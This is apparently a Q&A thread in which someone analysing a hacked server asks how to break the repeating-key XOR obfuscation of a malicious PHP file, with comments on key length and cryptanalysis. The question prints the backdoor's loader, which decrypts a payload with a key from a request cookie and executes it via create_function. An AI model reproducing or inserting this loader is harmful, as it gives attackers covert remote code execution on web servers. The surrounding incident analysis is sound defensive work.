# How to break an XOR cipher

Tags: php, encryption, cryptography, xor, deobfuscation

My friend's server was recently hacked and I'm trying to decipher the malicious files I found in hopes of understanding the hack better. I can tell that they're using an XOR cipher and I've tried to learn everything I could about that on my own, but while I am a programmer I'm not a cryptographer and most of what I've found has gone over my head.

What would I would actually need to do to break the cipher?

Here's the code in question:

```
<?php

$vewusl = 'ZW5jMTMz...XBzazt9KCRzJXMn'; //Truncated from 1165 lines of encrypted data by me, the guy asking this question

$_igophqd = create_function ('$vewusl', igophqd (base64_decode (
    'VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGo'.
    'DJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF'.
    '54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3c'.
    'yd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1'.
    'UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDR'.
    'xVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RC'.
    'tzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0I'.
    'gAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVc'.
    'LSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR'.
    '0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3'.
    'whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B'.
    '2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182'.
    'dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8'.
    'wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYi'.
    'QBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIwe'.
    'TI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNC'.
    'anp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajU'.
    'TORttSBpN'
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_igophqd($vewusl); 

function igophqd ($udopz, $bgsqhbl) { return $udopz ^ str_repeat ($bgsqhbl, ceil (strlen ($udopz) / strlen ($bgsqhbl))); }
```

I obviously don't have access to the data stored in the cookie. All the malicious files are the same, so I don't think we can use two of them to figure out the key.

Since the encrypted code creates a function, I assume it's executable PHP which likely has spaces, dollar signs, and other coding symbols. I tried using every tool I could find to help with this ([xortool](https://github.com/hellman/xortool), [XORRepeatingKeyCrypto](https://github.com/davehull/MCC/blob/master/sets/1/Crack-XORRepeatingKeyCrypto.ps1), [XORSearch & XORStrings](https://blog.didierstevens.com/programs/xorsearch/), [xorbruteforcer](http://eternal-todo.com/var/scripts/xorbruteforcer), [iheartxor](https://hooked-on-mnemonics.blogspot.com/p/iheartxor.html), [NoMoreXOR](https://github.com/hiddenillusion/NoMoreXOR)) but mind you I'm not really trained to use any of those.

Based on my analysis I suspect the key contains x62 and is either 32, 36, or 28 characters long, but again, I'm not an expert at this stuff. The key may also contain: x16,x17,x0d,x0f,x33,x66,x36,6,T,12...

I understand the programming part just fine, but I thought it might be useful to have the context. Here's the just the cipher I'm trying to break, which I think is XOR encrypted with a repeating key:

```
VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGoDJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3cyd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDRxVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RCtzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0IgAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVcLSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYiQBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIweTI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNCanp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajUTORttSBpN
```

And the base64 decoded version:

```
5513520a15191a101f5f5158430a4153421b07004a0402506d5404500b505041104d14305d7b56726270676f65566863206a0327412777327743357b0f71512258376923597c66616660787f66057c653050342768306731676624655400573247166b345e786a715f5a557171067766080621236f2062376061366235616f2666115637057b6a674f787d62022b7c6f52652f3251377327745404623640743300067021606c5162507367704b235471057a0724092065226743286131626530610976376068665275527360620a7565304726335215662c7053227b134361335b286b3e4d7477710746747f72535365205736227b305031735434715575772561247b24670154764f6c7574625752740e4b3c207c245236737d2d6236576d27710d7121707f73625f0e6c76442b737f1a6a362408207c205e612365327d763065287e31044e7775074e7e6f711666740e6522296b506e23605339701c50742200156022636f746365066e7f66526364527533220938623760612c7655476322710e6223040165734003756602566961055c2d266c0a65215a432d6236577b2948507a23770d66615c6f6c734b23567209663d266c2876266453006131656f34472b572474736071710e63726212667f207d07276b5076217079367b0f66542676336a2477777c62620f7f7f66336a7224722c337f377c2103750251266e74325c0a622e4d7356774f787160022b52700e0627337c2465204a792f62327d62335c346a044d7b567407647b614b2356720e0300227c2b7a2202793561317151245b3c7b23520870655f6c716171056163304301276b507521735f367526617c3058375637520c7465667c747172285466056136230816623760612e7613507226623f712e5d637c764f5564665f3073562776343b7c247e36706a2662335c743962507804630d66774f606566655b76660a6a0327412777327743286135506224012075336351707707747e65442b6175277122246f0e5621707e24750c5f7a30583766316774737606517871761a6162307932345e2345266465266b257e6426620a663467015474757b50727653737052763d397b3b762203043b640c790846194913426a7a7d7f7c7f7317681144453d410011550057011a174f144814123e174913426a6a77626173646c142a6463326c2d2e6a3513391b6d481a4d
```

Or am I supposed to retain the spaces in the base64 decoded output? I'm guessing that I don't retain the spaces and that this is what I should be trying to break, but these are the kinds of things I'm not sure about.

I also created [a gist with the full file contents](https://gist.github.com/beaulm/d5ff6e26e9ce48e0c8f68b5623507418) in case we need what's in $vewusl in order to crack this cipher.

Comment: This question seems more suited for cryptography.SE or like. Your question seems to be about how to crack a encrypted  message, not an actual specific programming question

Comment: 'I think is XOR encrypted with a repeating key' -> what makes you think that ?

Comment: nevermind, I saw the function in the last line, this indeed looks like Vigenere.

Comment: This is very explicitly **off topic** on cryptography.SE - there is even a specific close reason for it.

Comment: The outer cipher is XOR. There is no single reference to Vigènere in this code. Maybe it's in the currently encrypted function, but you never know. The function content is a little short. If `$_SERVER['HTTP_HOST']` is long, you're probably not going to be able to decrypt it to see the inner code.

Comment: As promised yesterday, I tried some things, and failed. Assuming I made no stupid error, the key probably is too long...

Comment: Thanks, I really appreciate it! I think I had gotten the wrong impression from reading elsewhere that it was more breakable than it really is.

Comment: Running [this index-of-coincidence calculator](https://crypto.stackexchange.com/a/35355) on the base64-decoded binary data (with the key length limit raised from 50 to 600), I'm seeing strong peaks at powers of 2 (and lesser peaks at small integer multiples of them). The peaks seem to grow taller up to 128, and then plateau out, so I'm guessing that the key length is probably 128 bytes. That's going to be tricky for most automated XOR crackers to handle, since the whole ciphertext is only 861 bytes long, but the fact that we know the plaintext is PHP code might make manual decoding possible.

Comment: Also, I agree with @Pac0 and Maarten that this question is off-topic at SO, and (as written, focusing on the specific ciphertext rather than on general cryptanalytic techniques) also at [crypto.SE]. It could be on-topic at [reverseengineering.SE], though. If you decide to re-ask it there, let me know and I'll try to post an answer. In the mean time, if you want to try breaking the cipher yourself, you might (perhaps) find [this approach](https://crypto.stackexchange.com/a/6095) useful (after splitting the ciphertext into 128-byte chunks).